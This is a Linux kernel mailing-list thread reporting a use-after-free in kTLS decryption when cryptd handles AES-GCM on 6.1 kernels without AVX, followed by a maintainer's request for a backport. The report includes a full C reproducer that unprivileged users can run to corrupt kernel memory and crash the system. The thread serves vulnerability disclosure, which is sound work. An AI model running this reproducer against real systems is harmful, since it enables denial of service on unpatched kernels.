netdev.vger.kernel.org archive mirror
* [BUG] Missing backport for UAF fix in interaction between tls_decrypt_sg and cryptd_queue_worker
From: William Liu @ 2025-08-11 17:03 UTC (permalink / raw)
  To: stable@vger.kernel.org
  Cc: sd@queasysnail.net, Jakub Kicinski, netdev@vger.kernel.org, Savy,
	john.fastabend@gmail.com, borisp@nvidia.com

Hi all,

Commit 41532b785e ("tls: separate no-async decryption request handling from async") [1] actually fixes a UAF read and write bug in the kernel and should be backported to 6.1. So far it has only been backported to 6.6, around the time the patch was committed. The commit message mentions a previously observed UAF that could not be reproduced, but we managed to hit the vulnerable case.

The vulnerable case arises when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, the request is dispatched to a worker and the call initially returns -EINPROGRESS. While older LTS versions (5.4, 5.10, and 5.15) seem to have an additional crypto_wait_req call for this case, 6.1 just returns success and frees the aead request. The cryptd worker may still be operating on the request at that point, which causes a UAF.
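
The ordering problem described above can be illustrated with a small userspace sketch. This is not kernel code: fake_req, fake_submit, fake_run_worker, fake_wait and fake_decrypt are hypothetical names, and a one-slot queue stands in for the cryptd work queue. It only shows why the submitter has to wait for completion after an -EINPROGRESS return before freeing the request.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for an AEAD request; not a kernel structure. */
struct fake_req {
    bool done;              /* set by the deferred worker */
    int err;                /* final status, valid once done is true */
    unsigned char out[16];  /* "plaintext" written by the worker */
};

/* One-slot queue standing in for the cryptd work queue. */
static struct fake_req *pending;

/* Queue the request and report that it will complete later. */
static int fake_submit(struct fake_req *req)
{
    assert(pending == NULL);    /* the sketch only supports one request */
    pending = req;
    return -EINPROGRESS;
}

/* Deferred worker: this is where the request memory is read and written. */
static void fake_run_worker(void)
{
    struct fake_req *req = pending;

    if (!req)
        return;
    pending = NULL;
    memset(req->out, 0xAA, sizeof(req->out));
    req->err = 0;
    req->done = true;
}

/* Analogue of waiting for completion: drive the worker until req is done. */
static int fake_wait(struct fake_req *req, int err)
{
    if (err != -EINPROGRESS)
        return err;
    while (!req->done)
        fake_run_worker();
    return req->err;
}

/* Submit, wait, and only then free the request. Returns 0 on success. */
int fake_decrypt(unsigned char *first_out)
{
    struct fake_req *req = calloc(1, sizeof(*req));
    int err;

    if (!req)
        return -ENOMEM;

    err = fake_wait(req, fake_submit(req));
    /*
     * Without the wait, 'pending' would still point at req here, and
     * freeing it would let the worker touch freed memory later.
     */
    if (!err)
        *first_out = req->out[0];
    free(req);
    return err;
}
```

Calling fake_decrypt() with a one-byte output buffer returns 0 only after the deferred worker has run, so the free never races with it. Dropping the fake_wait() call reproduces the shape of the bug: the function would return with the request still queued.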

However, this vulnerability only occurs when the CPU lacks AVX support (which may be why it was hard to reproduce). With AVX, aesni_init calls simd_register_aeads_compat, which forces the crypto subsystem to use the SIMD version and avoids the async issues raised by cryptd. While I doubt many people run host systems without AVX these days, this environment is quite common in VMs when QEMU uses KVM without the "-cpu host" flag.
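
To check whether a given guest falls into the no-AVX configuration described above, one option is to look for the "avx" token in the flags line of /proc/cpuinfo. The following is a minimal sketch; flags_line_has and cpu_has_flag are hypothetical helper names, and it assumes the x86 /proc/cpuinfo layout where the line starts with "flags".

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Return true if 'flag' appears as a whole whitespace-separated token in 'line'. */
bool flags_line_has(const char *line, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = line;

    if (n == 0)
        return false;
    while ((p = strstr(p, flag)) != NULL) {
        bool start_ok = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        bool end_ok = p[n] == '\0' || p[n] == ' ' ||
                      p[n] == '\t' || p[n] == '\n';

        if (start_ok && end_ok)
            return true;
        p++;    /* e.g. skip past "avx2" when looking for "avx" */
    }
    return false;
}

/*
 * Return 1 if the first "flags" line in /proc/cpuinfo contains 'flag',
 * 0 if it does not, and -1 if the file or the line could not be found.
 */
int cpu_has_flag(const char *flag)
{
    char line[8192];
    FILE *f = fopen("/proc/cpuinfo", "r");
    int ret = -1;

    if (!f)
        return -1;
    while (fgets(line, sizeof(line), f)) {
        if (strncmp(line, "flags", 5) == 0) {
            ret = flags_line_has(line, flag) ? 1 : 0;
            break;
        }
    }
    fclose(f);
    return ret;
}
```

A return value of 0 from cpu_has_flag("avx") inside the guest would suggest the environment matches the one in which we hit the bug; it does not by itself prove that the cryptd path is taken.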

The following repro can be triggered by an unprivileged user. Multi-shot KASAN reports multiple UAF reads and writes, and the system ends up panicking on a NULL pointer dereference.

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/tcp.h>
#include <linux/tls.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <linux/if_alg.h>
#include <signal.h>
#include <sys/wait.h>
#include <time.h>

struct tls_conn {
    int tx;
    int rx;
};

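void tls_enable(int sk, int type) {
    /* Key, IV, salt and record sequence stay zeroed; both ends use the same values. */
    struct tls12_crypto_info_aes_gcm_256 tls_ci = {
        .info.version = TLS_1_3_VERSION,
        .info.cipher_type = TLS_CIPHER_AES_GCM_256,
    };

    /* Attach the kernel TLS ULP, then install the crypto state for TX or RX. */
    if (setsockopt(sk, IPPROTO_TCP, TCP_ULP, "tls", sizeof("tls")) < 0)
        perror("setsockopt(TCP_ULP)");
    if (setsockopt(sk, SOL_TLS, type, &tls_ci, sizeof(tls_ci)) < 0)
        perror("setsockopt(SOL_TLS)");
}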

struct tls_conn *tls_create_conn(int port) {
    int s0 = socket(AF_INET, SOCK_STREAM, 0);
    int s1 = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in a = {
        .sin_family = AF_INET,
        .sin_port = htons(port),
        .sin_addr.s_addr = htonl(INADDR_ANY),
    };

    bind(s0, (struct sockaddr*)&a, sizeof(a));
    listen(s0, 1);
    connect(s1, (struct sockaddr *)&a, sizeof(a));
    int s2 = accept(s0, 0, 0);
    close(s0);
    
    tls_enable(s1, TLS_TX);
    tls_enable(s2, TLS_RX);

    struct tls_conn *t = calloc(1, sizeof(struct tls_conn));

    t->tx = s1;
    t->rx = s2;

    return t;
}

void tls_destroy_conn(struct tls_conn *t) {
    close(t->tx);
    close(t->rx);
    free(t);
}

int tls_send(struct tls_conn *t, char *data, size_t size) {
    return sendto(t->tx, data, size, 0, NULL, 0);
}

int tls_recv(struct tls_conn *t, char *data, size_t size) {
    return recvfrom(t->rx, data, size, 0, NULL, NULL);
}

int crypto_register_algo(char *type, char *name) {
    
    int s = socket(AF_ALG, SOCK_SEQPACKET, 0);

    struct sockaddr_alg sa = {};

    sa.salg_family = AF_ALG;
    strcpy(sa.salg_type, type);
    strcpy(sa.salg_name, name);

    bind(s, (struct sockaddr *)&sa, sizeof(sa));
    close(s);
    
    return 0;
}

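int main(void) {
    char buff[0x2000] = {0};

    /* Instantiate the cryptd-wrapped AEAD before kTLS allocates its cipher. */
    crypto_register_algo("aead", "cryptd(gcm(aes))");
    struct tls_conn *t = tls_create_conn(20000);

    /* One record is enough: the decrypt on the RX side goes through cryptd. */
    tls_send(t, buff, 0x10);
    tls_recv(t, buff, 0x100);
    return 0;
}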
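
Before blaming a failed reproduction on the kernel, it can help to confirm that the bind in crypto_register_algo really instantiated the cryptd variant and that it outranks the base driver. The sketch below scans /proc/crypto-style text for the highest-priority driver registered under a given algorithm name. field_value and best_driver_for are hypothetical helper names, and the sketch assumes each entry lists "name", then "driver", then "priority", which is how /proc/crypto prints them as far as we know.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* If 'line' is "<key> : <value>", copy <value> into dst and return 1. */
static int field_value(const char *line, const char *key,
                       char *dst, size_t dstlen)
{
    size_t klen = strlen(key);
    const char *v;

    if (strncmp(line, key, klen) != 0)
        return 0;
    if (line[klen] != ' ' && line[klen] != '\t' && line[klen] != ':')
        return 0;               /* a longer key that merely shares a prefix */
    v = strchr(line + klen, ':');
    if (!v)
        return 0;
    v++;
    while (*v == ' ' || *v == '\t')
        v++;
    snprintf(dst, dstlen, "%s", v);
    dst[strcspn(dst, "\r\n")] = '\0';
    return 1;
}

/*
 * Scan /proc/crypto-style text from 'f'. Among entries whose name equals
 * alg_name, copy the driver with the highest priority into 'driver' and
 * return that priority, or -1 if no entry matches.
 */
int best_driver_for(FILE *f, const char *alg_name,
                    char *driver, size_t driverlen)
{
    char line[512], val[256];
    char cur_name[256] = "", cur_driver[256] = "";
    int best = -1;

    while (fgets(line, sizeof(line), f)) {
        if (field_value(line, "name", val, sizeof(val))) {
            snprintf(cur_name, sizeof(cur_name), "%s", val);
            cur_driver[0] = '\0';
        } else if (field_value(line, "driver", val, sizeof(val))) {
            snprintf(cur_driver, sizeof(cur_driver), "%s", val);
        } else if (field_value(line, "priority", val, sizeof(val))) {
            int prio = atoi(val);

            if (strcmp(cur_name, alg_name) == 0 && prio > best) {
                best = prio;
                snprintf(driver, driverlen, "%s", cur_driver);
            }
        }
    }
    return best;
}
```

Opening /proc/crypto with fopen() and passing it in with alg_name "gcm(aes)" after the bind should, on an affected system, report a driver whose name starts with "cryptd(". Highest priority is only a hint at what the crypto API will select, so treat the result as a sanity check rather than proof.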

Feel free to let us know if you have any questions and if there is anything else we can do to help.

Best,
Will
Savy

[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=41532b785e9d79636b3815a64ddf6a096647d011

* Re: [BUG] Missing backport for UAF fix in interaction between tls_decrypt_sg and cryptd_queue_worker
From: Greg KH @ 2025-08-12  8:51 UTC (permalink / raw)
  To: William Liu
  Cc: stable@vger.kernel.org, sd@queasysnail.net, Jakub Kicinski,
	netdev@vger.kernel.org, Savy, john.fastabend@gmail.com,
	borisp@nvidia.com

On Mon, Aug 11, 2025 at 05:03:47PM +0000, William Liu wrote:
> Hi all,
> 
> Commit 41532b785e (tls: separate no-async decryption request handling from async) [1] actually covers a UAF read and write bug in the kernel, and should be backported to 6.1. As of now, it has only been backported to 6.6, back from the time when the patch was committed. The commit mentions a non-reproducible UAF that was previously observed, but we managed to hit the vulnerable case.
> 
> The vulnerable case is when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request, and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, it gets dispatched to a worker that handles it and initially returns EINPROGRESS. While older LTS versions (5.4, 5.10, and 5.15) seem to have an additional crypto_wait_req call in those cases, 6.1 just returns success and frees the aead request. The cryptd worker could still be operating in this case, which causes a UAF. 
> 
> However, this vulnerability only occurs when the CPU is without AVX support (perhaps this is why there were reproducibility difficulties). With AVX, aesni_init calls simd_register_aeads_compat to force the crypto subsystem to use the SIMD version and avoids the async issues raised by cryptd. While I doubt many people are using host systems without AVX these days, this environment is pretty common in VMs when QEMU uses KVM without using the "-cpu host" flag.
> 
> The following is a repro, and can be triggered from unprivileged users. Multishot KASAN shows multiple UAF reads and writes, and ends up panicking the system with a null dereference.

As you can test this, please provide a working backport of that commit
to the 6.1.y tree if you wish to see it applied to that kernel version
as it does not apply cleanly as-is.

Same for older kernel versions if you think it should be applied there
as well.

thanks,

greg k-h
